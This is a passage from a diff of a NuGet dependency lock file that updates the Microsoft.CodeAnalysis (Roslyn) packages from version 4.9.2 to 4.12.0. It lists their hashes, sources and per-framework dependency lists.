"Microsoft.CodeAnalysis.Analyzers", "version": "3.3.4", "sha512": "sha512-I+Riw6/6WjNICydoiNpDjN/GGP7u4XsL6VsI9lG/OjFufH3flvSEy/fxNhGDVGwZWwq/5BlnqX+LH2dmheaPfg==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": [], "net462": [], "net47": [], "net471": [], "net472": [], "net48": [], "net5.0": [], "net6.0": [], "net7.0": [], "net8.0": [], "net9.0": [], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": [], "netcoreapp2.1": [], "netcoreapp2.2": [], "netcoreapp3.0": [], "netcoreapp3.1": [], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": [], "netstandard2.1": []}, "targeting_pack_overrides": [], "framework_list": []}, - {"name": "Microsoft.CodeAnalysis.Common", "id": "Microsoft.CodeAnalysis.Common", "version": "4.9.2", "sha512": "sha512-XCtqPQdnoqfrBSidFWIESm8exXVHF4yPY94e84St2PVZPc2bGeQNXdFNwadu1Bd2sr/bAgM5B0UHbCqBz+/SeQ==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": ["Microsoft.CodeAnalysis.Analyzers", "System.Collections.Immutable", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe"], "net462": ["Microsoft.CodeAnalysis.Analyzers", "System.Collections.Immutable", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe"], "net47": ["Microsoft.CodeAnalysis.Analyzers", "System.Collections.Immutable", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe"], "net471": ["Microsoft.CodeAnalysis.Analyzers", "System.Collections.Immutable", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe"], "net472": 
["Microsoft.CodeAnalysis.Analyzers", "System.Collections.Immutable", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe"], "net48": ["Microsoft.CodeAnalysis.Analyzers", "System.Collections.Immutable", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe"], "net5.0": ["Microsoft.CodeAnalysis.Analyzers", "System.Collections.Immutable", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe"], "net6.0": ["Microsoft.CodeAnalysis.Analyzers", "System.Collections.Immutable", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe"], "net7.0": ["Microsoft.CodeAnalysis.Analyzers", "System.Collections.Immutable", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe"], "net8.0": ["Microsoft.CodeAnalysis.Analyzers", "System.Collections.Immutable", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe"], "net9.0": ["Microsoft.CodeAnalysis.Analyzers", "System.Collections.Immutable", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe"], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": ["Microsoft.CodeAnalysis.Analyzers", "System.Collections.Immutable", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe"], "netcoreapp2.1": ["Microsoft.CodeAnalysis.Analyzers", "System.Collections.Immutable", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe"], "netcoreapp2.2": ["Microsoft.CodeAnalysis.Analyzers", "System.Collections.Immutable", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe"], "netcoreapp3.0": ["Microsoft.CodeAnalysis.Analyzers", "System.Collections.Immutable", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe"], "netcoreapp3.1": ["Microsoft.CodeAnalysis.Analyzers", "System.Collections.Immutable", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe"], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], 
"netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": ["Microsoft.CodeAnalysis.Analyzers", "System.Collections.Immutable", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe"], "netstandard2.1": ["Microsoft.CodeAnalysis.Analyzers", "System.Collections.Immutable", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe"]}, "targeting_pack_overrides": [], "framework_list": []}, - {"name": "Microsoft.CodeAnalysis.CSharp", "id": "Microsoft.CodeAnalysis.CSharp", "version": "4.9.2", "sha512": "sha512-oy5nUdJOaOQEjUZimhYH4xU6nVxt8ctkdP7HT2fc32ecvH50QeIwJXgjNt7MGUyhJO+Wd3SipQWQ5QyDw7VuLg==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": ["Microsoft.CodeAnalysis.Common"], "net462": ["Microsoft.CodeAnalysis.Common"], "net47": ["Microsoft.CodeAnalysis.Common"], "net471": ["Microsoft.CodeAnalysis.Common"], "net472": ["Microsoft.CodeAnalysis.Common"], "net48": ["Microsoft.CodeAnalysis.Common"], "net5.0": ["Microsoft.CodeAnalysis.Common"], "net6.0": ["Microsoft.CodeAnalysis.Common"], "net7.0": ["Microsoft.CodeAnalysis.Common"], "net8.0": ["Microsoft.CodeAnalysis.Common"], "net9.0": ["Microsoft.CodeAnalysis.Common"], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": ["Microsoft.CodeAnalysis.Common"], "netcoreapp2.1": ["Microsoft.CodeAnalysis.Common"], "netcoreapp2.2": ["Microsoft.CodeAnalysis.Common"], "netcoreapp3.0": ["Microsoft.CodeAnalysis.Common"], "netcoreapp3.1": ["Microsoft.CodeAnalysis.Common"], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": ["Microsoft.CodeAnalysis.Common"], "netstandard2.1": ["Microsoft.CodeAnalysis.Common"]}, "targeting_pack_overrides": [], "framework_list": []}, - {"name": 
"Microsoft.CodeAnalysis.CSharp.Workspaces", "id": "Microsoft.CodeAnalysis.CSharp.Workspaces", "version": "4.9.2", "sha512": "sha512-NfP1c+OjN0KbFxhSN2DXilIjZzH6p/DzkF+yemB0v/7nhQkvRq7cDle6TpWgpw12JKOSa6lSirfECbRSyLFGhA==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.Workspaces.Common", "Humanizer.Core"], "net462": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.Workspaces.Common", "Humanizer.Core"], "net47": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.Workspaces.Common", "Humanizer.Core"], "net471": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.Workspaces.Common", "Humanizer.Core"], "net472": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.Workspaces.Common", "Humanizer.Core"], "net48": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.Workspaces.Common", "Humanizer.Core"], "net5.0": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.Workspaces.Common", "Humanizer.Core"], "net6.0": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.Workspaces.Common", "Humanizer.Core"], "net7.0": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.Workspaces.Common", "Humanizer.Core"], "net8.0": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.Workspaces.Common", "Humanizer.Core"], "net9.0": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.Workspaces.Common", "Humanizer.Core"], "netcoreapp1.0": [], 
"netcoreapp1.1": [], "netcoreapp2.0": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.Workspaces.Common", "Humanizer.Core"], "netcoreapp2.1": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.Workspaces.Common", "Humanizer.Core"], "netcoreapp2.2": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.Workspaces.Common", "Humanizer.Core"], "netcoreapp3.0": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.Workspaces.Common", "Humanizer.Core"], "netcoreapp3.1": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.Workspaces.Common", "Humanizer.Core"], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.Workspaces.Common", "Humanizer.Core"], "netstandard2.1": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.Workspaces.Common", "Humanizer.Core"]}, "targeting_pack_overrides": [], "framework_list": []}, - {"name": "Microsoft.CodeAnalysis.VisualBasic", "id": "Microsoft.CodeAnalysis.VisualBasic", "version": "4.9.2", "sha512": "sha512-Jx3d7jpZ2bdCb/FzVBPD2a4P8jFDhdoEugGoxLxVKtBDzHA5+RdQL0BWvzwrP1Tdw3YPshrUelNlZXmcNXqZyA==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": ["Microsoft.CodeAnalysis.Common"], "net462": ["Microsoft.CodeAnalysis.Common"], "net47": ["Microsoft.CodeAnalysis.Common"], "net471": ["Microsoft.CodeAnalysis.Common"], "net472": ["Microsoft.CodeAnalysis.Common"], "net48": ["Microsoft.CodeAnalysis.Common"], "net5.0": 
["Microsoft.CodeAnalysis.Common"], "net6.0": ["Microsoft.CodeAnalysis.Common"], "net7.0": ["Microsoft.CodeAnalysis.Common"], "net8.0": ["Microsoft.CodeAnalysis.Common"], "net9.0": ["Microsoft.CodeAnalysis.Common"], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": ["Microsoft.CodeAnalysis.Common"], "netcoreapp2.1": ["Microsoft.CodeAnalysis.Common"], "netcoreapp2.2": ["Microsoft.CodeAnalysis.Common"], "netcoreapp3.0": ["Microsoft.CodeAnalysis.Common"], "netcoreapp3.1": ["Microsoft.CodeAnalysis.Common"], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": ["Microsoft.CodeAnalysis.Common"], "netstandard2.1": ["Microsoft.CodeAnalysis.Common"]}, "targeting_pack_overrides": [], "framework_list": []}, - {"name": "Microsoft.CodeAnalysis.VisualBasic.Workspaces", "id": "Microsoft.CodeAnalysis.VisualBasic.Workspaces", "version": "4.9.2", "sha512": "sha512-v07rvZvckHiPLDzKXFs9AXfEGsDeTvR+N9YHO9wQqboXgms4HCv0fTrZOOgqM/aVS7racJKRo1tf62UfjqMeEw==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.CodeAnalysis.Workspaces.Common"], "net462": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.CodeAnalysis.Workspaces.Common"], "net47": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.CodeAnalysis.Workspaces.Common"], "net471": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.CodeAnalysis.Workspaces.Common"], "net472": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.CodeAnalysis.Workspaces.Common"], "net48": ["Microsoft.CodeAnalysis.Common", 
"Microsoft.CodeAnalysis.VisualBasic", "Microsoft.CodeAnalysis.Workspaces.Common"], "net5.0": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.CodeAnalysis.Workspaces.Common"], "net6.0": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.CodeAnalysis.Workspaces.Common"], "net7.0": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.CodeAnalysis.Workspaces.Common"], "net8.0": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.CodeAnalysis.Workspaces.Common"], "net9.0": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.CodeAnalysis.Workspaces.Common"], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.CodeAnalysis.Workspaces.Common"], "netcoreapp2.1": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.CodeAnalysis.Workspaces.Common"], "netcoreapp2.2": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.CodeAnalysis.Workspaces.Common"], "netcoreapp3.0": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.CodeAnalysis.Workspaces.Common"], "netcoreapp3.1": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.CodeAnalysis.Workspaces.Common"], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.CodeAnalysis.Workspaces.Common"], "netstandard2.1": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.CodeAnalysis.Workspaces.Common"]}, "targeting_pack_overrides": [], "framework_list": []}, - {"name": "Microsoft.CodeAnalysis.Workspaces.Common", "id": 
"Microsoft.CodeAnalysis.Workspaces.Common", "version": "4.9.2", "sha512": "sha512-DieswZYcYVGDPeT6m7M4i+0aKkjSgyjmI9z9HJEDSRZdvXfKYLEKwmlFGUTyzFS4brnyMCwLSiw2KWVAydpzVA==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": ["Microsoft.CodeAnalysis.Common", "Humanizer.Core", "System.Composition", "System.IO.Pipelines", "System.Threading.Channels"], "net462": ["Microsoft.CodeAnalysis.Common", "Humanizer.Core", "System.Composition", "System.IO.Pipelines", "System.Threading.Channels"], "net47": ["Microsoft.CodeAnalysis.Common", "Humanizer.Core", "System.Composition", "System.IO.Pipelines", "System.Threading.Channels"], "net471": ["Microsoft.CodeAnalysis.Common", "Humanizer.Core", "System.Composition", "System.IO.Pipelines", "System.Threading.Channels"], "net472": ["Microsoft.CodeAnalysis.Common", "Humanizer.Core", "System.Composition", "System.IO.Pipelines", "System.Threading.Channels"], "net48": ["Microsoft.CodeAnalysis.Common", "Humanizer.Core", "System.Composition", "System.IO.Pipelines", "System.Threading.Channels"], "net5.0": ["Microsoft.CodeAnalysis.Common", "Humanizer.Core", "System.Composition", "System.IO.Pipelines", "System.Threading.Channels"], "net6.0": ["Microsoft.CodeAnalysis.Common", "Humanizer.Core", "System.Composition", "System.IO.Pipelines", "System.Threading.Channels"], "net7.0": ["Microsoft.CodeAnalysis.Common", "Humanizer.Core", "System.Composition", "System.IO.Pipelines", "System.Threading.Channels"], "net8.0": ["Microsoft.CodeAnalysis.Common", "Humanizer.Core", "System.Composition", "System.IO.Pipelines", "System.Threading.Channels"], "net9.0": ["Microsoft.CodeAnalysis.Common", "Humanizer.Core", "System.Composition", "System.IO.Pipelines", "System.Threading.Channels"], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": ["Microsoft.CodeAnalysis.Common", "Humanizer.Core", 
"System.Composition", "System.IO.Pipelines", "System.Threading.Channels"], "netcoreapp2.1": ["Microsoft.CodeAnalysis.Common", "Humanizer.Core", "System.Composition", "System.IO.Pipelines", "System.Threading.Channels"], "netcoreapp2.2": ["Microsoft.CodeAnalysis.Common", "Humanizer.Core", "System.Composition", "System.IO.Pipelines", "System.Threading.Channels"], "netcoreapp3.0": ["Microsoft.CodeAnalysis.Common", "Humanizer.Core", "System.Composition", "System.IO.Pipelines", "System.Threading.Channels"], "netcoreapp3.1": ["Microsoft.CodeAnalysis.Common", "Humanizer.Core", "System.Composition", "System.IO.Pipelines", "System.Threading.Channels"], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": ["Microsoft.CodeAnalysis.Common", "Humanizer.Core", "System.Composition", "System.IO.Pipelines", "System.Threading.Channels"], "netstandard2.1": ["Microsoft.CodeAnalysis.Common", "Humanizer.Core", "System.Composition", "System.IO.Pipelines", "System.Threading.Channels"]}, "targeting_pack_overrides": [], "framework_list": []}, + {"name": "Microsoft.CodeAnalysis.Common", "id": "Microsoft.CodeAnalysis.Common", "version": "4.12.0", "sha512": "sha512-83sYPF0SekVhecApCFXsLCsQL9qFzAl5ieCEqVb8Uo08nV34YD3cfq7FLv6EkhnAwPbP7ky19sAEEqYLDUrxWA==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": ["Microsoft.CodeAnalysis.Analyzers", "System.Collections.Immutable", "System.Memory", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Tasks.Extensions", "System.Buffers", "System.Numerics.Vectors"], "net462": ["Microsoft.CodeAnalysis.Analyzers", "System.Collections.Immutable", "System.Memory", "System.Reflection.Metadata", 
"System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Tasks.Extensions", "System.Buffers", "System.Numerics.Vectors"], "net47": ["Microsoft.CodeAnalysis.Analyzers", "System.Collections.Immutable", "System.Memory", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Tasks.Extensions", "System.Buffers", "System.Numerics.Vectors"], "net471": ["Microsoft.CodeAnalysis.Analyzers", "System.Collections.Immutable", "System.Memory", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Tasks.Extensions", "System.Buffers", "System.Numerics.Vectors"], "net472": ["Microsoft.CodeAnalysis.Analyzers", "System.Collections.Immutable", "System.Memory", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Tasks.Extensions", "System.Buffers", "System.Numerics.Vectors"], "net48": ["Microsoft.CodeAnalysis.Analyzers", "System.Collections.Immutable", "System.Memory", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Tasks.Extensions", "System.Buffers", "System.Numerics.Vectors"], "net5.0": ["Microsoft.CodeAnalysis.Analyzers", "System.Collections.Immutable", "System.Memory", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Tasks.Extensions", "System.Buffers", "System.Numerics.Vectors"], "net6.0": ["Microsoft.CodeAnalysis.Analyzers", "System.Collections.Immutable", "System.Memory", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Tasks.Extensions", "System.Buffers", "System.Numerics.Vectors"], "net7.0": ["Microsoft.CodeAnalysis.Analyzers", "System.Collections.Immutable", "System.Reflection.Metadata"], "net8.0": 
["Microsoft.CodeAnalysis.Analyzers", "System.Collections.Immutable", "System.Reflection.Metadata"], "net9.0": ["Microsoft.CodeAnalysis.Analyzers", "System.Collections.Immutable", "System.Reflection.Metadata"], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": ["Microsoft.CodeAnalysis.Analyzers", "System.Collections.Immutable", "System.Memory", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Tasks.Extensions", "System.Buffers", "System.Numerics.Vectors"], "netcoreapp2.1": ["Microsoft.CodeAnalysis.Analyzers", "System.Collections.Immutable", "System.Memory", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Tasks.Extensions", "System.Buffers", "System.Numerics.Vectors"], "netcoreapp2.2": ["Microsoft.CodeAnalysis.Analyzers", "System.Collections.Immutable", "System.Memory", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Tasks.Extensions", "System.Buffers", "System.Numerics.Vectors"], "netcoreapp3.0": ["Microsoft.CodeAnalysis.Analyzers", "System.Collections.Immutable", "System.Memory", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Tasks.Extensions", "System.Buffers", "System.Numerics.Vectors"], "netcoreapp3.1": ["Microsoft.CodeAnalysis.Analyzers", "System.Collections.Immutable", "System.Memory", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Tasks.Extensions", "System.Buffers", "System.Numerics.Vectors"], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": ["Microsoft.CodeAnalysis.Analyzers", "System.Collections.Immutable", "System.Memory", 
"System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Tasks.Extensions", "System.Buffers", "System.Numerics.Vectors"], "netstandard2.1": ["Microsoft.CodeAnalysis.Analyzers", "System.Collections.Immutable", "System.Memory", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Tasks.Extensions", "System.Buffers", "System.Numerics.Vectors"]}, "targeting_pack_overrides": [], "framework_list": []}, + {"name": "Microsoft.CodeAnalysis.CSharp", "id": "Microsoft.CodeAnalysis.CSharp", "version": "4.12.0", "sha512": "sha512-Dbb/taxFill9/+2HRJufXW3udAtJaQw3+LzbWTDyYx7Z02HVdU5ydMXXTqg5lFgSmLDNBe+B8jRuI2eYw8OBOA==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Tasks.Extensions"], "net462": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Tasks.Extensions"], "net47": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Tasks.Extensions"], "net471": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.Analyzers", 
"System.Buffers", "System.Collections.Immutable", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Tasks.Extensions"], "net472": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Tasks.Extensions"], "net48": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Tasks.Extensions"], "net5.0": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Tasks.Extensions"], "net6.0": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Tasks.Extensions"], "net7.0": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.Analyzers", "System.Collections.Immutable", "System.Reflection.Metadata"], "net8.0": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.Analyzers", "System.Collections.Immutable", "System.Reflection.Metadata"], "net9.0": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.Analyzers", "System.Collections.Immutable", "System.Reflection.Metadata"], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": 
["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Tasks.Extensions"], "netcoreapp2.1": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Tasks.Extensions"], "netcoreapp2.2": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Tasks.Extensions"], "netcoreapp3.0": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Tasks.Extensions"], "netcoreapp3.1": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Tasks.Extensions"], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", 
